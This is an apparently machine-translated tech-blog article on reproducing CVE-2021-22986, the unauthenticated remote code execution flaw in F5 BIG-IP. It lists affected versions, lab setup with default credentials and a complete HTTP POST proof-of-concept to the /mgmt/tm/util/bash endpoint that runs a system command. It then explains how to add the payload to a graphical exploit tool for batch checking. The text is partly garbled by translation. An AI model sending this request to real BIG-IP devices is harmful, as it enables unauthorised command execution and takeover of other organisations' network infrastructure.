Shulou(Shulou.com)05/31 Report--

This article shows you how to reproduce F5 BIG-IP remote code execution vulnerability CVE-2021-22986, concise and easy to understand, definitely can make you shine, through the detailed introduction of this article I hope you can gain something.

0x01 Vulnerability Description

F5 BIG-IP is an application delivery platform of F5 company, which integrates network traffic management, application security management, Load Balancer and other functions.

CVE-2021-22986 This vulnerability allows an unauthenticated attacker to gain network access to the iControl REST interface via the BIG-IP management interface and its own IP address to execute arbitrary system commands, create or delete files, and disable services.

0x02 Vulnerability Impact F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IP 15.1.0-15.1.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IQ 6.0.0-6.1.00x03 bug recurrence

https://login.f5.com/resource/registerEmail.do Register and download

https://downloads.f5.com/esd/eula.sv? sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept Select ova format, you can quickly use vm virtual machine to open, after installation, user name: root, password: default, after successful login, enter config, enter config several times to see the current ip, access Enter

3.1 POC attack POST /mgmt/tm/util/bash HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Host: 192.168.1.191Content-Length: 39{"command":"run","utilCmdArgs":"-c id"}

0x04 Writing with tools

Write directly using the last graphical exploit tool

Graphical exploit tool updated

Project address: github.com/yhy0/ExpDemo-JavaFX

V1.1

Refer to the ice scorpion agent, add agent settings, easy to walk burp debugging

Optimize the batch check logic by using interfaces so that each time a new exploit is added, there is no need to modify the batch check logic.

Create a new CVE_2021_22986 class under src/main/java/com/yhy/core, implement the ExploitInterface interface, and implement the functions inside. Fill in the details. Copy the contents of the example CVE_2020_14882 in the project directly. Modify the contents and fill in the payload.

After writing, go to src/main/java/com/yhy/core/Constants.java and src/main/java/com/yhy/tools/Tools.java to modify

Run it.

This is how to reproduce F5 BIG-IP remote code execution vulnerability CVE-2021-22986. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.